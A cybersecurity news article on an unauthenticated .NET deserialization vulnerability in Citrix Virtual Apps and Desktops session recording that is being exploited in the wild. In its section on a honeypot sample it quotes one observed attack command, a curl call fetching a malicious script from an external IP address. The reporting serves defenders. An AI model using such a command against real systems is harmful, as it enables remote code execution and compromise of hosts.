Saturday, December 7, 2024
HomeCyber Security NewsCitrix Virtual Apps & Desktops Zero-Day Vulnerability Exploited in the Wild

Citrix Virtual Apps & Desktops Zero-Day Vulnerability Exploited in the Wild

Published on

SIEM as a Service

A critical new vulnerability has been discovered in Citrix’s Virtual Apps and Desktops solution, which is widely used to facilitate secure remote access to desktop applications now exploited in the wild.

The vulnerability, which remains unpatched, was detailed last week by Watchtowr Labs in a blog post . This flaw poses a significant threat, as the solution is frequently used in environments like call centers to isolate individual workstations from actual desktops, particularly in remote work setups.

Vulnerability Details

Citrix Virtual Apps and Desktops provide remote users access to full desktop environments from various devices, including laptops, tablets, and smartphones.

- Advertisement - SIEM as a Service

However, Watchtowr Labs warns that the same technology could be exploited by malicious actors, including ransomware groups. The problem lies in how all desktops are hosted on a single server, meaning a privilege escalation exploit could compromise not just one desktop but the entire server and all active sessions connected to it.

One particularly concerning aspect of Citrix’s solution is its session recording feature. Citrix allows administrators to record user sessions for later review, but the review process relies on a vulnerable .NET deserialization function.

This vulnerability is exploitable without requiring authentication, making it a prime target for cybercriminals. Watchtowr Labs has published proof-of-concept exploit code on GitHub , making it accessible to anyone.

Maximizing Cybersecurity ROI: Expert Tips for SME & MSP Leaders - Attend Free Webinar

Sample Exploit Details

According to SANS report, A sample exploit observed recently highlights the seriousness of the vulnerability. In a honeypot environment, a POST request was sent to a Citrix system, attempting to execute a command that fetched a malicious script from an external server.

The exploit took advantage of a messaging queue used by Citrix (msmq/private$/citrixsmaudeventdata) and sought to execute the following command:

curl http://91.212.166.60/script_xen80-mix.php

Attempts to access the malicious script led to a 404 error, raising speculation that the attacker may be filtering requests based on IP addresses or collecting IP addresses for future attacks.

The attack originated from IP address 192.143.1.40, which is linked to an ISP in Johannesburg, South Africa.

The unpatched vulnerability in Citrix Virtual Apps and Desktops poses a severe risk to organizations relying on the platform for remote access.

Since the exploit allows attackers to execute commands remotely without authentication, it could lead to widespread system compromise. The fact that all desktops are hosted on the same server exacerbates the issue, as an attacker gaining control of one session could potentially control all connected sessions.

Citrix has not yet released a patch for this vulnerability, and organizations using the affected product should be on high alert.

In the meantime, Watchtowr Labs advises organizations to monitor for unusual activity, especially from unfamiliar IP addresses, and to consider implementing additional security measures to mitigate the potential impact of this vulnerability.

Simplify and speed up Threat Analysis Workflow by Auto-detonating Cyber Attacks in a Malware sandbox

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

DaMAgeCard Attack – New SD Card Attack Lets Hackers Directly Access System Memory

Security researchers have identified a significant vulnerability dubbed "DaMAgeCard Attack" in the new SD...

Deloitte Denies Breach, Claims Only Single System Affected

Ransomware group Brain Cipher claimed to have breached Deloitte UK and threatened to publish...

Top Five Industries Most Frequently Targeted by Phishing Attacks

Researchers analyzed phishing attacks from Q3 2023 to Q3 2024 and identified the top...

Russian BlueAlpha APT Exploits Cloudflare Tunnels to Distribute Custom Malware

BlueAlpha, a Russian state-sponsored group, is actively targeting Ukrainian individuals and organizations by using...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

DaMAgeCard Attack – New SD Card Attack Lets Hackers Directly Access System Memory

Security researchers have identified a significant vulnerability dubbed "DaMAgeCard Attack" in the new SD...

Deloitte Denies Breach, Claims Only Single System Affected

Ransomware group Brain Cipher claimed to have breached Deloitte UK and threatened to publish...

Top Five Industries Most Frequently Targeted by Phishing Attacks

Researchers analyzed phishing attacks from Q3 2023 to Q3 2024 and identified the top...